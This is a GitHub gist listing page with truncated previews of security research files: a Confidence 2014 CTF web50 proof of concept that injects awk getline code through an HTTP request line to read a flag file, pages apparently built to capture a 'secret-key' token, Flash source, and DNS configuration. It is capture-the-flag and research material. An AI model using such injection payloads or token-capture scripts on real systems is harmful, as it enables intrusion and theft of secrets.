Skip to content

Instantly share code, notes, and snippets.

ZoczuS

Block or report user

Report or block ZoczuS

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@ZoczuS
ZoczuS / web50
Created Jun 2, 2014
Confidence 2014 CTF web50 poc
View web50
c40957:ctf jakub.zoczek$ telnet web50.ctf 80
Trying 10.240.160.22...
Connected to web50.ctf.
Escape character is '^]'.
GET a";x=getline%20line<"./flag";x=getline%20line<"./flag";print%20line;uri="fala HTTP/1.1
HTTP/1.1 200 OK
Server: /bin/bash
Content-Type: text/html
View mailsteal.html
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
</head>
<body>
<script>
console.log=function(a){
if(a == "Start") {
// start ;-)
View 3bugs.html
<html><body>
<script>
console.log=function(a){
var x = document.getElementById("content");
if(a == "Start") {
// start ;-)
}
else {
var pos = a.search("secret-key");
var token = a.substring(pos+13, pos+13+33);
View cd.as
package {
import flash.net.*;
import flash.system.*;
import flash.events.*;
import flash.external.ExternalInterface;
import flash.display.*;
import flash.text.*;
public class cd extends Sprite{
public var room:Loader;
View kraski-universal-blogplayer.as
/*
* Source code for kraski-universal-blogplayer.swf (C) Yandex
*
* Decompiled using flaczki - https://github.com/chung-leong/flaczki
*
*/
package ru.yandex.kraski.universalpainter.preloader
{
public class KraskiPreloader extends flash.display::Sprite implements {mx.preloaders}::IPreloaderDisplay
{
View 1.2.3.4
$TTL 3600
@ IN SOA ns1.blabla.com. admin.blabla.com. (
2014011414 ;serial
14400 ;refresh
3600 ;retry
604800 ;expire
10800 ;minimum
)
View named.conf
zone "4.3.2.1.in-addr.arpa." IN {
type master;
allow-transfer { 8.8.8.8; }; // put your 2nd dns ip here
check-names ignore;
file "/etc/bind/1.2.3.4";
};
You can’t perform that action at this time.